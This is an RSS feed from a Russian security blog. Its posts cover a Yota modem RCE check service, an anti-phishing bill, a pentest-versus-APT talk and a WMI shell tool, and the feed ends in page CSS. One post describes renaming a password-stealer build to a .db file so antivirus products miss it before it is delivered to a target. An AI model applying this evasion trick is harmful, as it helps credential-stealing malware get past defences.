<?xml version="1.0" encoding="UTF-8" standalone="no"?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0"><channel><title>В тему ИБ</title><description></description><managingEditor>noreply@blogger.com (Dmitry Evteev)</managingEditor><pubDate>Tue, 27 Jan 2026 13:26:15 +0300</pubDate><generator>Blogger http://www.blogger.com</generator><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">349</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">25</openSearch:itemsPerPage><link>http://devteev.blogspot.com/</link><language>en-us</language><itunes:explicit>no</itunes:explicit><itunes:subtitle/><itunes:category text="Technology"/><itunes:owner><itunes:email>noreply@blogger.com</itunes:email></itunes:owner><item><title>Сплоетс на миллион</title><link>http://devteev.blogspot.com/2015/11/blog-post.html</link><category>exploits</category><category>free</category><category>vulns</category><category>Yota</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Fri, 27 Nov 2015 14:13:00 +0300</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-2336746030854803361</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div style="text-align: justify;"&gt;
Для всех пользователей LTE модемов компании Yota (к котором в т.ч. относится и Ваш покорный слуга) компания &lt;a href="http://www.hlsec.ru/"&gt;HeadLight Security&lt;/a&gt; запустила бесплатный онлайн сервис по проверке наличия известных уязвимостей в решениях этой телекоммуникационной компании. Проверить свой компьютер можно по следующей ссылке – &lt;a href="http://yota.hlsec.ru/"&gt;http://yota.hlsec.ru/&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Наиболее опасная уязвимость, которая содержится в распространяемом ПО вместе с самим LTE-модемом, позволяет выполнить произвольное приложение на уязвимой системе. Эксплоит является кроссплатформенным и затрагивает операционные системы на базе Windows и MacOS. Условия проведения атаки можно сравнить, например, с &lt;a href="https://grahamcluley.com/2015/09/zero-day-vulnerability-kaspersky-fireeye/"&gt;пруфом&lt;/a&gt; &lt;a href="https://twitter.com/taviso"&gt;Tavis Ormandy&lt;/a&gt;, который позволял провести RCE в отношении компьютера с установленным антивирусом Касперского, т.е. достаточно просто посетить определенный "заряженный" веб-сайт. В свое время аналогичными уязвимостями отличились и антивирус Avast [&lt;a href="https://twitter.com/taviso/status/647408764505579520"&gt;тынц&lt;/a&gt;], и антивирус компании ESET [&lt;a href="https://code.google.com/p/google-security-research/issues/detail?id=456"&gt;брякс&lt;/a&gt;].&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Обновление от производителя в настоящее время отсутствует. В качестве workaround можно на время (до выхода соотвествующего обновления) удалить софт от Yota, поставляемого вместе с LTE свистелкой. Это не повлияет на работу в интернете, но защитит компьютер от RCE.&lt;/div&gt;
&lt;/div&gt;
</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total></item><item><title>Противодействие фишингу на государственном уровне</title><link>http://devteev.blogspot.com/2015/10/blog-post.html</link><category>phishing</category><category>мошенничество</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Thu, 29 Oct 2015 18:17:00 +0300</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-3918291143397159353</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div style="text-align: justify;"&gt;
Сегодня ваш покорный слуга принял участие в обсуждении &lt;a href="http://www.interfax.ru/russia/472734"&gt;нового законопроекта&lt;/a&gt; о введении уголовного наказания за фишинговые сайты (расширение &lt;a href="http://www.consultant.ru/popular/ukrf/10_38.html#p5235"&gt;Главы 28 УК РФ. Преступления в сфере компьютерной информации&lt;/a&gt;). За выделенные мне 10 минут постарался донести до законотворцев мысль о том, что существует рынок консалтинговых услуг в сфере информационной безопасности. И, в связи с инициативой депутата госдумы&amp;nbsp;&lt;a href="https://ru.wikipedia.org/wiki/%D0%9A%D0%BE%D1%81%D1%82%D1%83%D0%BD%D0%BE%D0%B2,_%D0%98%D0%BB%D1%8C%D1%8F_%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D1%8C%D0%B5%D0%B2%D0%B8%D1%87"&gt;Ильи Костунова&lt;/a&gt; о новом законе, необходимо&amp;nbsp;сохранить&amp;nbsp;&lt;a href="http://www.hlsec.ru/services/social-engineering/"&gt;социотехнические тесты&lt;/a&gt;&amp;nbsp;в правовом поле.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br&gt;
&lt;div style="text-align: center;"&gt;
&lt;iframe allowfullscreen="" frameborder="0" height="355" marginheight="0" marginwidth="0" scrolling="no" src="//www.slideshare.net/slideshow/embed_code/key/GP2zaiqW5Lv7w9" style="border-width: 1px; border: 1px solid #CCC; margin-bottom: 5px; max-width: 100%;" width="425"&gt; &lt;/iframe&gt; &lt;br&gt;
&lt;div style="margin-bottom: 5px;"&gt;
&lt;strong&gt; &lt;a href="https://www.slideshare.net/devteev/ss-54528075" target="_blank" title="Противодействие хищению персональных данных и платежной информации в сети Интернет посредством фишинга"&gt;Противодействие хищению персональных данных и платежной информации в сети Интернет посредством фишинга&lt;/a&gt; &lt;/strong&gt; from &lt;strong&gt;&lt;a href="https://www.slideshare.net/devteev" target="_blank"&gt;Dmitry Evteev&lt;/a&gt;&lt;/strong&gt; &lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>penetest VS. APT</title><link>http://devteev.blogspot.com/2015/10/penetest-vs-apt.html</link><category>advanced persistent threat</category><category>apt-attack</category><category>DC7499</category><category>pentest</category><category>persistent</category><category>threat</category><category>выступления</category><category>мероприятия</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Sun, 4 Oct 2015 11:11:00 +0300</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-3555607888038587537</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div style="text-align: justify;"&gt;
После многострадального квеста в российского предпринимателя ваш покорный слуга вновь погружается в привычное ему амплуа. Так, погружение состоялось на площадке &lt;a href="http://defcon.su/0x0a/"&gt;DEFCON MOSCOW 0X0A&lt;/a&gt; &lt;a href="https://twitter.com/dc7499"&gt;#DC7499&lt;/a&gt;, где наравне с&amp;nbsp;&lt;a href="https://twitter.com/k1k_"&gt;Сергеем Головановым&lt;/a&gt; и&amp;nbsp;&lt;a href="https://twitter.com/udalite"&gt;Никитой Кислициным&lt;/a&gt; я поднял популярную нынче тему &lt;a href="https://en.wikipedia.org/wiki/Advanced_persistent_threat"&gt;APT&lt;/a&gt;. К слову, оставшуюся программу мероприятия, практически всецело, заняли мои коллеги по &lt;a href="http://www.hlsec.ru/"&gt;текущей работе&lt;/a&gt; - &lt;a href="https://twitter.com/090h"&gt;Олег Купреев&lt;/a&gt; и &lt;a href="https://twitter.com/cyberpunkych"&gt;Михаил Фирстов&lt;/a&gt; (разумеется помимо выступления великого человека &lt;a href="https://twitter.com/nedos"&gt;Дмитрия Недоспасова&lt;/a&gt;). С моей презентацией можно ознакомиться ниже, презентации других участников встречи, насколько я понимаю, появятся чуть позже на &lt;a href="http://defcon.su/"&gt;сайте мероприятия&lt;/a&gt;.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;iframe allowfullscreen="" frameborder="0" height="355" marginheight="0" marginwidth="0" scrolling="no" src="//www.slideshare.net/slideshow/embed_code/key/KtIpDchID44Nxv" style="border-width: 1px; border: 1px solid #CCC; margin-bottom: 5px; max-width: 100%;" width="425"&gt; &lt;/iframe&gt; &lt;br /&gt;
&lt;div style="margin-bottom: 5px;"&gt;
&lt;strong&gt; &lt;a href="https://www.slideshare.net/devteev/penetest-vs-apt" target="_blank" title="penetest VS. APT"&gt;penetest VS. APT&lt;/a&gt; &lt;/strong&gt; from &lt;strong&gt;&lt;a href="https://www.slideshare.net/devteev" target="_blank"&gt;Dmitry Evteev&lt;/a&gt;&lt;/strong&gt; &lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>[hacking tricks] AVs bypass</title><link>http://devteev.blogspot.com/2014/05/hacking-tricks-avs-bypass.html</link><category>bypass</category><category>windows</category><category>антивирусы</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Sun, 4 May 2014 19:42:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-427293632207924187</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div style="text-align: justify;"&gt;
Не все &lt;strike&gt;помнят&lt;/strike&gt; знают, что командная строка Windows воспринимает любой файл с произвольным расширением, как исполняемую PE-программу. Это &amp;nbsp;в свою очередь может с успехом использоваться для обхода превентивных механизмов защиты. В качестве примера возьмем известный по &lt;a href="https://www.virustotal.com/"&gt;virustotal&lt;/a&gt;&amp;nbsp;Passwords Stealer UFR [&lt;a href="http://vazonez.com/forum/index.php?topic=3.0"&gt;тынц&lt;/a&gt;] и не безызвестный антивирус&amp;nbsp;&lt;a href="http://www.mcafee.com/ru/"&gt;McAfee&lt;/a&gt;, который уже знает&amp;nbsp;про эту стягивалку паролей [&lt;a href="https://www.virustotal.com/en/file/d0036da71942b7ffe50b4ee32eaf72db4218eab955b81e98b50b781ed288f046/analysis/1399196646/"&gt;PWS-FAPK!31754313CD59&lt;/a&gt;]. Создадим новый билд UFR Stealer и сразу же переименуем его, например так: C:\Temp&amp;gt;&amp;nbsp;&lt;b&gt;move test.exe test.db&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbaxdq3IoexTzS6x62qgzRKAgLOhd-qP8Nd4hWjhICcRZj3BYVRulQ6ZltadhsAeelSBayXt-SN0mIKtCeZSDggH5LIhrSkaOKVTawvFX5aokdE95hwxjPno6zs-7oQfs-ejGp4uT2cYU/s1600/UFR3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbaxdq3IoexTzS6x62qgzRKAgLOhd-qP8Nd4hWjhICcRZj3BYVRulQ6ZltadhsAeelSBayXt-SN0mIKtCeZSDggH5LIhrSkaOKVTawvFX5aokdE95hwxjPno6zs-7oQfs-ejGp4uT2cYU/s1600/UFR3.png" width="500" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Теперь любым волшебным способом доставим исполняемый файл test.db на целевой компьютер, на котором уже крутится антивирус McAfee и...&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVYWMliufwzP8k9-hvC2v-3vTbRjoBRMqfpfzObPLreYv3N8bQLpL7oJMJptNHkH2bau8H8o0FhPvYCCx3O3VJSpKUSS0UfPZREj77U6cKwt2Z3TC4Yr7zD5kpogSu5j8cAaQ3jLVRKjI/s1600/McAfee_bypass.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVYWMliufwzP8k9-hvC2v-3vTbRjoBRMqfpfzObPLreYv3N8bQLpL7oJMJptNHkH2bau8H8o0FhPvYCCx3O3VJSpKUSS0UfPZREj77U6cKwt2Z3TC4Yr7zD5kpogSu5j8cAaQ3jLVRKjI/s1600/McAfee_bypass.png" width="580" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Аналогичным образом обходятся и другие аверы в т.ч. антивирус Касперского, а вот родной для винды Windows Defender такие особенности командной строки блюдет(( радует лишь то, что дефендер не перегружен знаниями о самой малвари))&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbaxdq3IoexTzS6x62qgzRKAgLOhd-qP8Nd4hWjhICcRZj3BYVRulQ6ZltadhsAeelSBayXt-SN0mIKtCeZSDggH5LIhrSkaOKVTawvFX5aokdE95hwxjPno6zs-7oQfs-ejGp4uT2cYU/s72-c/UFR3.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>[hacking tricks] Полноценный WMI shell</title><link>http://devteev.blogspot.com/2014/04/hacking-tricks-wmi-shell.html</link><category>exec</category><category>RPC</category><category>windows</category><category>wmi</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Sat, 26 Apr 2014 00:41:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-3869968949976941243</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;Усилиями&amp;nbsp;Andrei Dumitrescu появился полноценный WMI шелл на Python. Тула разработана в контексте выступления Andrei's на проходящем сейчас мероприятии&amp;nbsp;&lt;a href="https://twitter.com/search?q=%23hes2014&amp;amp;src=hash" target="_blank"&gt;#HES2014&lt;/a&gt;&amp;nbsp; [&lt;a href="http://2014.hackitoergosum.org/"&gt;http://2014.hackitoergosum.org/&lt;/a&gt;].&lt;br /&gt;
&lt;br /&gt;
Ознакомиться с презентацией можно по следующей ссылке [&lt;a href="https://speakerdeck.com/hackitoergosum/hes2014-wmi-shell-a-new-way-to-get-shells-on-remote-windows-machines-using-only-the-wmi-service-by-andrei-dumitrescu" target="_blank"&gt;тынц&lt;/a&gt;].&lt;/div&gt;&lt;style&gt;
/* http://cssdeck.com/labs/pure-css-osx-terminal */
body { background:#d2dfe6;
color: #444;
font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
line-height: 1.5em;
}

/* FINDER WINDOW */

#window{
    width: 90%;
    margin-top:40px;
 margin-left: auto;
 margin-right: auto;
    margin-bottom:40px;
    min-width: 500px; 
    background: #fff;
    border-radius: 5px;
    -webkit-box-shadow: 0px 0px 20px rgba(0,0,0,0.75);
    -moz-box-shadow: 0px 0px 20px rgba(0,0,0,0.75);
    /*-webkit-transition:all 0.5s; */
    overflow: hidden; 
}

/* TOP BAR */
#topbar{
    width: 100%;
    height: 21px;
    font-size: 16px;
    font-family: "Myriad Pro", sans-serif;
    text-shadow:0px 1px 0px rgba(255,255,255,0.25);
    -webkit-box-shadow:0 1px 0 rgba(0,0,0,0.5); 
    -moz-box-shadow:0 1px 0 rgba(0,0,0,0.5); 
   
    
}
#topbar ul li {
    float: left; 
    padding:0 10px;
    height: 21px;
    line-height: 24px;
}
#topbar ul li:first-child{
    font-size: 20px;
    line-height: 26px;
    margin-left: 5px;
}
#topbar ul li:nth-child(2){
    font-family: "Myriad-Semi", sans-serif;
}
#topbar ul li:active{
    background-image: -webkit-gradient(linear,left bottom,left top,color-stop(1, #4a82ff),color-stop(0, #0052fc));
    color: #fff;
    text-shadow: none;
}
#toolbar{
    width: 100%; 
    height: 25px;
    background: grey;
    border-radius:5px 5px 0 0;

    background: #cfcfcf; /* Old browsers */
    background: -moz-linear-gradient(top,  #cfcfcf 0%, #a8a8a8 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#cfcfcf), color-stop(100%,#a8a8a8)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* IE10+ */
    background: linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* W3C */
    
    -webkit-box-shadow:0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;
    -moz-box-shadow:0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;
    box-shadow:0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;        
    
}
#toolbar .top{
    float: left; 
    width: 100%; 
    height: 23px;
}
#toolbar .bottom{
    float: left; 
    width: 100%; 
    height: 30px;
}

/*-----TRAFFIC LIGHTS-----*/
#toolbar #lights{
    float: left;
    position:relative;
    top:4px;
    left:7px; 
}
.light{
    float:left;
    width:14px;
    height:14px;
    border-radius:14px;
    -webkit-box-shadow:0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
    -moz-box-shadow:0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
    box-shadow:0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
    overflow: hidden;
}
#lights:hover .glyph{
    opacity: 1;
    cursor:default;
    
}
.light .shine{
     width: 4px;
     height:3px;
     border-radius:10px;
     /*background-image: -webkit-gradient(radial, center center, 0, center center, 3, from(rgba(255,255,255,1)), to(rgba(255,255,255,0)));*/
     background: -moz-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%, rgba(255,255,255,0) 100%); /* FF3.6+ */    
     background-image: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%,rgba(255,255,255,1)), color-stop(100%,rgba(255,255,255,0))); /* Chrome,Safari4+ */
     background: -webkit-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* Chrome10+,Safari5.1+ */
     background: -o-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* Opera 12+ */
     background: -ms-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* IE10+ */
     background: radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* W3C */
     
}
.light .glow{
    width:14px;
    height:8px; 
    background-image: -webkit-gradient(radial, center bottom, 0, center center, 5, from(rgba(255,255,255,0.75)), to(rgba(255,255,255,0)));
    background: 0px 0px -moz-radial-gradient(bottom, cover,  rgba(255,255,255,0.70) 0%, rgba(255,255,255,0) 80%); /* FF3.6+ */
   
}
/*--RED--*/
.red{
   background: #f41b16; /* Old browsers */
   background: -moz-linear-gradient(top,  #f41b16 0%, #fc7471 100%); /* FF3.6+ */
   background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#f41b16), color-stop(100%,#fc7471)); /* Chrome,Safari4+ */
   background: -webkit-linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* Chrome10+,Safari5.1+ */
   background: -o-linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* Opera 11.10+ */
   background: -ms-linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* IE10+ */
   background: linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* W3C */   
}
.red:active{
     
    background: #972f2e; /* Old browsers */
    background: -moz-linear-gradient(top,  #972f2e 0%, #fc7471 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#972f2e), color-stop(100%,#fc7471)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* IE10+ */
    background: linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* W3C */    
}
.red .shine{    
    position: relative;
    top: -23px;
    left: 5px;  
}
.red .glow{
    position: relative;
    top: -22px;
}
.red .glyph{
    position: relative;
    top: -6px;
    left: 3px;
    font-size: 14px;
    font-weight: bold;
    color: #9b3a36;
    z-index: 50;
    opacity: 0;
}
/*--YELLOW--*/
.yellow{
    background: #f4a316; /* Old browsers */
    background: -moz-linear-gradient(left,  #f4a316 0%, #fcc371 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, right top, color-stop(0%,#f4a316), color-stop(100%,#fcc371)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* IE10+ */
    background: linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* W3C */  
    margin:0px 7px;
}
.yellow:active{
    background: #ae4f1e; /* Old browsers */
    background: -moz-linear-gradient(top,  #ae4f1e 0%, #fcc371 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#ae4f1e), color-stop(100%,#fcc371)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* IE10+ */
    background: linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* W3C */    
}
.yellow .shine{ 
    position: relative;
    top: -23px;
    left: 5px;  
}
.yellow .glow{
    position: relative;
    top: -22px;
}


.yellow .glyph{
    position: relative;
    top: -7px;
    left: 4px;
    font-size: 24px;
    color: #854322;
    z-index: 50;
    opacity: 0;
    -webkit-transform: scaleY(1.5) scaleX(1.3);
}

/*--GREEN--*/
.green{
    
    background: #4cae2e; /* Old browsers */
    background: -moz-linear-gradient(top,  #4cae2e 0%, #dafc71 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#4cae2e), color-stop(100%,#dafc71)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* IE10+ */
    background: linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* W3C */
    
}
.green:active{
  background: #48752b; /* Old browsers */
  background: -moz-linear-gradient(top,  #48752b 0%, #dafc71 100%); /* FF3.6+ */
  background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#48752b), color-stop(100%,#dafc71)); /* Chrome,Safari4+ */
  background: -webkit-linear-gradient(top,  #48752b 0%,#dafc71 100%); /* Chrome10+,Safari5.1+ */
  background: -o-linear-gradient(top,  #48752b 0%,#dafc71 100%); /* Opera 11.10+ */
  background: -ms-linear-gradient(top,  #48752b 0%,#dafc71 100%); /* IE10+ */
  background: linear-gradient(top,  #48752b 0%,#dafc71 100%); /* W3C */
  
}
.green .shine{  
    position: relative;
    top: -22px;
    left: 5px; 
}
.green .glow{
    position: relative;
    top: -22px;
}
.green .glyph{
    position: relative;
    top: -6px;
    left: 3px;
    font-size: 14px;
    font-weight: bold;
    color: #25571d;
    z-index: 50;
    opacity: 0;
}

/* Horrible to do this for firefox */
@-moz-document url-prefix() {
  
  .red .glyph {
      position: relative;
      top: -4px;
  }  
  .yellow .glyph {
      top: -4px;
      left: 3px;
  }
    
  .green .glyph{
      position: relative;
      top: -4px;
  }
  
}

/*-----TITLE-----*/
#title{
    float: left; 
    position: relative;
    top:4px;
    width:40%;
    left: 30%;
    font-family: "Myriad Pro", sans-serif; 
    font-size: 14px; 
    text-shadow: 0px 1px 0px rgba(255,255,255,0.5);
    line-height: 14px; 
}
.folder{
    float: left;
    margin-right:5px;
}
.folder .tab{
    width:4px;
    height:2px;
    background:#a4c5da;
    border:1px solid #728ea3;
    border-bottom: none;
    border-radius:2px 2px 0px 0px;
    -webkit-box-shadow:0px -1px 0px #99b5c7 inset;
    margin-left: 1px;
    z-index: 5000;
    margin-bottom: -1px; 
}
.folder .body{
    width: 14px;
    height: 10px;
    border:1px solid #6e8ba1;
    
    background: #b8cfe0; /* Old browsers */
    background: -moz-linear-gradient(top,  #b8cfe0 0%, #86adc8 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#b8cfe0), color-stop(100%,#86adc8)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* IE10+ */
    background: linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* W3C */    
    
    z-index: -50;
    
    -webkit-box-shadow:0px 1px 0px rgba(255,255,255,0.25) inset,0px 1px 0px rgba(0,0,0,0.2);
    -moz-box-shadow:0px 1px 0px rgba(255,255,255,0.25) inset,0px 1px 0px rgba(0,0,0,0.2);
}


#nav{
    margin: 1px 8px;
    float: left;
}
#view{
    margin: 2px 0 0 110px;
    display: inline-block;
}

.control_box{
    height:20px;
    border-radius: 3px;
    border: 1px solid #555;
    background-image: -webkit-gradient(linear,left bottom,left top,color-stop(1, #fefefe),color-stop(0, #b8b8b8));
    box-shadow:0px 1px 0px rgba(255,255,255,0.25);
}
.control_box .control{
    height:20px;
    border-right: 1px solid #2e2e2e;
    float: left;
    text-align: center; 
    width: 27px; 
}
.control:last-child{
    border-right: 0px solid !important;
}
.control:active{ 
    background: #b0afb0; 
    -webkit-box-shadow:0px 0px 4px #000 inset;
}
.active{
    background: #707070 !important;
    -webkit-box-shadow:0px 3px 4px rgba(0,0,0,0.6) inset !important;
}


#body {
    font-family: Andale Mono, monospace;  line-height: 1em;
    font-size:13px;
    float: left;
    width: 100%;
    min-height:130px;
    background:#000;
    padding:10px;
    line-height:1.5em;
}
#body p { 
   color: #63de00!important; 
}

@keyframes blink
{
 0%   {  background:rgba(99,222,0,100);  }
 100% {  background:rgba(99,222,0,0);  }
}

@-webkit-keyframes blink {
 0%   {  background:rgba(99,222,0,100);  }
 100% {  background:rgba(99,222,0,0);  }
}
@-moz-keyframes blink {
 0%   {  background:rgba(99,222,0,100);  }
 100% {  background:rgba(99,222,0,0);  }
}
.cursor {
  background:#63de00; 
  display:inline-block;
  width:11px;
  height:19px;
  margin-bottom:-3px;
}
#body:hover .cursor {
    -webkit-animation-name: blink;
    -webkit-animation-duration: 1.5s;
    -webkit-animation-iteration-count: infinite;
    -moz-animation-name: blink;
    -moz-animation-duration: 1.5s;
    -moz-animation-iteration-count: infinite;
}
  
#body p::-webkit-selection  {
    background:#0b209e;
}
#body p::selection { background:#0b209e; }
#body p::-moz-selection { background:#0b209e; }

#body p {
  margin-top:5px;
  margin-bottom:5px;
  font-size:13px;
}

#content{
    float: left; 
    margin-top: 1px;
}
#foot{
    height: 23px;
    width: 100%;
    float: left;
    background-image: -webkit-gradient(linear,left bottom,left top,color-stop(1, #cbcbcb),color-stop(0, #a7a7a7));
    border-top:1px solid #515151;
    border-radius:0 0 5px 5px;
}
#foot .handle{
    width: 11px;
    height: 11px;
    float: right;
    margin: 6px;
    overflow: hidden;
}
.handle .grip{
    -webkit-transform: rotate(45deg) scaley(3);
    margin: 2px 0 0 2px;
    color: #646464;
    text-shadow: 1px 1px 0 #c6c6c6;
    font-size: 14px;
}

.icon{
    width: 86px; 
    height: 100px;
    margin: 20px; 
    float: left;
    font-family: "Myriad Pro", sans-serif; 
    text-align: center; 
    font-size: 12px;
}
.icon .frame{
    width: 82px;
    height: 82px; 
    border-radius: 5px;
    border: 2px solid transparent; 
}
.icon .name{
    color: #000;
    padding-top: 3px; 
    border-radius:15px;
    width: 55px;
    margin: 5px 0 0 15px;
}
.icon .folder{
    margin:15px 0 0 6px;
}
&lt;/style&gt;&lt;br /&gt;
